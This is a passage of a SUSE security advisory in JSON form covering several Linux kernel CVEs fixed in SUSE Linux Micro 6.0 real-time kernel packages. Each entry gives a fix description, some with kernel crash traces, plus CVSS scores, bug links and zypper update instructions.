"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54045"
},
{
"cve": "CVE-2023-54048",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54048"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/bnxt_re: Prevent handling any completions after qp destroy\n\nHW may generate completions that indicates QP is destroyed.\nDriver should not be scheduling any more completion handlers\nfor this QP, after the QP is destroyed. Since CQs are active\nduring the QP destroy, driver may still schedule completion\nhandlers. This can cause a race where the destroy_cq and poll_cq\nrunning simultaneously.\n\nSnippet of kernel panic while doing bnxt_re driver load unload in loop.\nThis indicates a poll after the CQ is freed. \n\n[77786.481636] Call Trace:\n[77786.481640] \u003cTASK\u003e\n[77786.481644] bnxt_re_poll_cq+0x14a/0x620 [bnxt_re]\n[77786.481658] ? kvm_clock_read+0x14/0x30\n[77786.481693] __ib_process_cq+0x57/0x190 [ib_core]\n[77786.481728] ib_cq_poll_work+0x26/0x80 [ib_core]\n[77786.481761] process_one_work+0x1e5/0x3f0\n[77786.481768] worker_thread+0x50/0x3a0\n[77786.481785] ? __pfx_worker_thread+0x10/0x10\n[77786.481790] kthread+0xe2/0x110\n[77786.481794] ? __pfx_kthread+0x10/0x10\n[77786.481797] ret_from_fork+0x2c/0x50\n\nTo avoid this, complete all completion handlers before returning the\ndestroy QP. If free_cq is called soon after destroy_qp, IB stack\nwill cancel the CQ work before invoking the destroy_cq verb and\nthis will prevent any race mentioned.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54048",
"url": "https://www.suse.com/security/cve/CVE-2023-54048"
},
{
"category": "external",
"summary": "SUSE Bug 1256395 for CVE-2023-54048",
"url": "https://bugzilla.suse.com/1256395"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54048"
},
{
"cve": "CVE-2023-54049",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54049"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nrpmsg: glink: Add check for kstrdup\n\nAdd check for the return value of kstrdup() and return the error\nif it fails in order to avoid NULL pointer dereference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54049",
"url": "https://www.suse.com/security/cve/CVE-2023-54049"
},
{
"category": "external",
"summary": "SUSE Bug 1256396 for CVE-2023-54049",
"url": "https://bugzilla.suse.com/1256396"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54049"
},
{
"cve": "CVE-2023-54051",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54051"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: do not allow gso_size to be set to GSO_BY_FRAGS\n\nOne missing check in virtio_net_hdr_to_skb() allowed\nsyzbot to crash kernels again [1]\n\nDo not allow gso_size to be set to GSO_BY_FRAGS (0xffff),\nbecause this magic value is used by the kernel.\n\n[1]\ngeneral protection fault, probably for non-canonical address 0xdffffc000000000e: 0000 [#1] PREEMPT SMP KASAN\nKASAN: null-ptr-deref in range [0x0000000000000070-0x0000000000000077]\nCPU: 0 PID: 5039 Comm: syz-executor401 Not tainted 6.5.0-rc5-next-20230809-syzkaller #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/26/2023\nRIP: 0010:skb_segment+0x1a52/0x3ef0 net/core/skbuff.c:4500\nCode: 00 00 00 e9 ab eb ff ff e8 6b 96 5d f9 48 8b 84 24 00 01 00 00 48 8d 78 70 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea 03 \u003c0f\u003e b6 04 02 84 c0 74 08 3c 03 0f 8e ea 21 00 00 48 8b 84 24 00 01\nRSP: 0018:ffffc90003d3f1c8 EFLAGS: 00010202\nRAX: dffffc0000000000 RBX: 000000000001fffe RCX: 0000000000000000\nRDX: 000000000000000e RSI: ffffffff882a3115 RDI: 0000000000000070\nRBP: ffffc90003d3f378 R08: 0000000000000005 R09: 000000000000ffff\nR10: 000000000000ffff R11: 5ee4a93e456187d6 R12: 000000000001ffc6\nR13: dffffc0000000000 R14: 0000000000000008 R15: 000000000000ffff\nFS: 00005555563f2380(0000) GS:ffff8880b9800000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000020020000 CR3: 000000001626d000 CR4: 00000000003506f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n\u003cTASK\u003e\nudp6_ufo_fragment+0x9d2/0xd50 net/ipv6/udp_offload.c:109\nipv6_gso_segment+0x5c4/0x17b0 net/ipv6/ip6_offload.c:120\nskb_mac_gso_segment+0x292/0x610 net/core/gso.c:53\n__skb_gso_segment+0x339/0x710 net/core/gso.c:124\nskb_gso_segment include/net/gso.h:83 [inline]\nvalidate_xmit_skb+0x3a5/0xf10 net/core/dev.c:3625\n__dev_queue_xmit+0x8f0/0x3d60 net/core/dev.c:4329\ndev_queue_xmit include/linux/netdevice.h:3082 [inline]\npacket_xmit+0x257/0x380 net/packet/af_packet.c:276\npacket_snd net/packet/af_packet.c:3087 [inline]\npacket_sendmsg+0x24c7/0x5570 net/packet/af_packet.c:3119\nsock_sendmsg_nosec net/socket.c:727 [inline]\nsock_sendmsg+0xd9/0x180 net/socket.c:750\n____sys_sendmsg+0x6ac/0x940 net/socket.c:2496\n___sys_sendmsg+0x135/0x1d0 net/socket.c:2550\n__sys_sendmsg+0x117/0x1e0 net/socket.c:2579\ndo_syscall_x64 arch/x86/entry/common.c:50 [inline]\ndo_syscall_64+0x38/0xb0 arch/x86/entry/common.c:80\nentry_SYSCALL_64_after_hwframe+0x63/0xcd\nRIP: 0033:0x7ff27cdb34d9",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54051",
"url": "https://www.suse.com/security/cve/CVE-2023-54051"
},
{
"category": "external",
"summary": "SUSE Bug 1256394 for CVE-2023-54051",
"url": "https://bugzilla.suse.com/1256394"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54051"
},
{
"cve": "CVE-2023-54052",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54052"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mt76: mt7921: fix skb leak by txs missing in AMSDU\n\ntxs may be dropped if the frame is aggregated in AMSDU. When the problem\nshows up, some SKBs would be hold in driver to cause network stopped\ntemporarily. Even if the problem can be recovered by txs timeout handling,\nmt7921 still need to disable txs in AMSDU to avoid this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54052",
"url": "https://www.suse.com/security/cve/CVE-2023-54052"
},
{
"category": "external",
"summary": "SUSE Bug 1256387 for CVE-2023-54052",
"url": "https://bugzilla.suse.com/1256387"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54052"
},
{
"cve": "CVE-2023-54060",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54060"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niommufd: Set end correctly when doing batch carry\n\nEven though the test suite covers this it somehow became obscured that\nthis wasn\u0027t working.\n\nThe test iommufd_ioas.mock_domain.access_domain_destory would blow up\nrarely.\n\nend should be set to 1 because this just pushed an item, the carry, to the\npfns list.\n\nSometimes the test would blow up with:\n\n BUG: kernel NULL pointer dereference, address: 0000000000000000\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 0 P4D 0\n Oops: 0000 [#1] SMP\n CPU: 5 PID: 584 Comm: iommufd Not tainted 6.5.0-rc1-dirty #1236\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\n RIP: 0010:batch_unpin+0xa2/0x100 [iommufd]\n Code: 17 48 81 fe ff ff 07 00 77 70 48 8b 15 b7 be 97 e2 48 85 d2 74 14 48 8b 14 fa 48 85 d2 74 0b 40 0f b6 f6 48 c1 e6 04 48 01 f2 \u003c48\u003e 8b 3a 48 c1 e0 06 89 ca 48 89 de 48 83 e7 f0 48 01 c7 e8 96 dc\n RSP: 0018:ffffc90001677a58 EFLAGS: 00010246\n RAX: 00007f7e2646f000 RBX: 0000000000000000 RCX: 0000000000000001\n RDX: 0000000000000000 RSI: 00000000fefc4c8d RDI: 0000000000fefc4c\n RBP: ffffc90001677a80 R08: 0000000000000048 R09: 0000000000000200\n R10: 0000000000030b98 R11: ffffffff81f3bb40 R12: 0000000000000001\n R13: ffff888101f75800 R14: ffffc90001677ad0 R15: 00000000000001fe\n FS: 00007f9323679740(0000) GS:ffff8881ba540000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 0000000105ede003 CR4: 00000000003706a0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n Call Trace:\n \u003cTASK\u003e\n ? show_regs+0x5c/0x70\n ? __die+0x1f/0x60\n ? page_fault_oops+0x15d/0x440\n ? lock_release+0xbc/0x240\n ? exc_page_fault+0x4a4/0x970\n ? asm_exc_page_fault+0x27/0x30\n ? batch_unpin+0xa2/0x100 [iommufd]\n ? batch_unpin+0xba/0x100 [iommufd]\n __iopt_area_unfill_domain+0x198/0x430 [iommufd]\n ? __mutex_lock+0x8c/0xb80\n ? __mutex_lock+0x6aa/0xb80\n ? xa_erase+0x28/0x30\n ? iopt_table_remove_domain+0x162/0x320 [iommufd]\n ? lock_release+0xbc/0x240\n iopt_area_unfill_domain+0xd/0x10 [iommufd]\n iopt_table_remove_domain+0x195/0x320 [iommufd]\n iommufd_hw_pagetable_destroy+0xb3/0x110 [iommufd]\n iommufd_object_destroy_user+0x8e/0xf0 [iommufd]\n iommufd_device_detach+0xc5/0x140 [iommufd]\n iommufd_selftest_destroy+0x1f/0x70 [iommufd]\n iommufd_object_destroy_user+0x8e/0xf0 [iommufd]\n iommufd_destroy+0x3a/0x50 [iommufd]\n iommufd_fops_ioctl+0xfb/0x170 [iommufd]\n __x64_sys_ioctl+0x40d/0x9a0\n do_syscall_64+0x3c/0x80\n entry_SYSCALL_64_after_hwframe+0x46/0xb0",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54060",
"url": "https://www.suse.com/security/cve/CVE-2023-54060"
},
{
"category": "external",
"summary": "SUSE Bug 1256379 for CVE-2023-54060",
"url": "https://bugzilla.suse.com/1256379"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54060"
},
{
"cve": "CVE-2023-54064",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54064"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipmi:ssif: Fix a memory leak when scanning for an adapter\n\nThe adapter scan ssif_info_find() sets info-\u003eadapter_name if the adapter\ninfo came from SMBIOS, as it\u0027s not set in that case. However, this\nfunction can be called more than once, and it will leak the adapter name\nif it had already been set. So check for NULL before setting it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54064",
"url": "https://www.suse.com/security/cve/CVE-2023-54064"
},
{
"category": "external",
"summary": "SUSE Bug 1256375 for CVE-2023-54064",
"url": "https://bugzilla.suse.com/1256375"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54064"
},
{
"cve": "CVE-2023-54066",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54066"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-usb-v2: gl861: Fix null-ptr-deref in gl861_i2c_master_xfer\n\nIn gl861_i2c_master_xfer, msg is controlled by user. When msg[i].buf\nis null and msg[i].len is zero, former checks on msg[i].buf would be\npassed. Malicious data finally reach gl861_i2c_master_xfer. If accessing\nmsg[i].buf[0] without sanity check, null ptr deref would happen.\nWe add check on msg[i].len to prevent crash.\n\nSimilar commit:\ncommit 0ed554fd769a\n(\"media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54066",
"url": "https://www.suse.com/security/cve/CVE-2023-54066"
},
{
"category": "external",
"summary": "SUSE Bug 1256373 for CVE-2023-54066",
"url": "https://bugzilla.suse.com/1256373"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54066"
},
{
"cve": "CVE-2023-54067",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54067"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix race when deleting free space root from the dirty cow roots list\n\nWhen deleting the free space tree we are deleting the free space root\nfrom the list fs_info-\u003edirty_cowonly_roots without taking the lock that\nprotects it, which is struct btrfs_fs_info::trans_lock.\nThis unsynchronized list manipulation may cause chaos if there\u0027s another\nconcurrent manipulation of this list, such as when adding a root to it\nwith ctree.c:add_root_to_dirty_list().\n\nThis can result in all sorts of weird failures caused by a race, such as\nthe following crash:\n\n [337571.278245] general protection fault, probably for non-canonical address 0xdead000000000108: 0000 [#1] PREEMPT SMP PTI\n [337571.278933] CPU: 1 PID: 115447 Comm: btrfs Tainted: G W 6.4.0-rc6-btrfs-next-134+ #1\n [337571.279153] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014\n [337571.279572] RIP: 0010:commit_cowonly_roots+0x11f/0x250 [btrfs]\n [337571.279928] Code: 85 38 06 00 (...)\n [337571.280363] RSP: 0018:ffff9f63446efba0 EFLAGS: 00010206\n [337571.280582] RAX: ffff942d98ec2638 RBX: ffff9430b82b4c30 RCX: 0000000449e1c000\n [337571.280798] RDX: dead000000000100 RSI: ffff9430021e4900 RDI: 0000000000036070\n [337571.281015] RBP: ffff942d98ec2000 R08: ffff942d98ec2000 R09: 000000000000015b\n [337571.281254] R10: 0000000000000009 R11: 0000000000000001 R12: ffff942fe8fbf600\n [337571.281476] R13: ffff942dabe23040 R14: ffff942dabe20800 R15: ffff942d92cf3b48\n [337571.281723] FS: 00007f478adb7340(0000) GS:ffff94349fa40000(0000) knlGS:0000000000000000\n [337571.281950] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n [337571.282184] CR2: 00007f478ab9a3d5 CR3: 000000001e02c001 CR4: 0000000000370ee0\n [337571.282416] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n [337571.282647] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n [337571.282874] Call Trace:\n [337571.283101] \u003cTASK\u003e\n [337571.283327] ? __die_body+0x1b/0x60\n [337571.283570] ? die_addr+0x39/0x60\n [337571.283796] ? exc_general_protection+0x22e/0x430\n [337571.284022] ? asm_exc_general_protection+0x22/0x30\n [337571.284251] ? commit_cowonly_roots+0x11f/0x250 [btrfs]\n [337571.284531] btrfs_commit_transaction+0x42e/0xf90 [btrfs]\n [337571.284803] ? _raw_spin_unlock+0x15/0x30\n [337571.285031] ? release_extent_buffer+0x103/0x130 [btrfs]\n [337571.285305] reset_balance_state+0x152/0x1b0 [btrfs]\n [337571.285578] btrfs_balance+0xa50/0x11e0 [btrfs]\n [337571.285864] ? __kmem_cache_alloc_node+0x14a/0x410\n [337571.286086] btrfs_ioctl+0x249a/0x3320 [btrfs]\n [337571.286358] ? mod_objcg_state+0xd2/0x360\n [337571.286577] ? refill_obj_stock+0xb0/0x160\n [337571.286798] ? seq_release+0x25/0x30\n [337571.287016] ? __rseq_handle_notify_resume+0x3ba/0x4b0\n [337571.287235] ? percpu_counter_add_batch+0x2e/0xa0\n [337571.287455] ? __x64_sys_ioctl+0x88/0xc0\n [337571.287675] __x64_sys_ioctl+0x88/0xc0\n [337571.287901] do_syscall_64+0x38/0x90\n [337571.288126] entry_SYSCALL_64_after_hwframe+0x72/0xdc\n [337571.288352] RIP: 0033:0x7f478aaffe9b\n\nSo fix this by locking struct btrfs_fs_info::trans_lock before deleting\nthe free space root from that list.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54067",
"url": "https://www.suse.com/security/cve/CVE-2023-54067"
},
{
"category": "external",
"summary": "SUSE Bug 1256369 for CVE-2023-54067",
"url": "https://bugzilla.suse.com/1256369"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54067"
},
{
"cve": "CVE-2023-54069",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54069"
}
],
"notes": [
{
"category": "general",
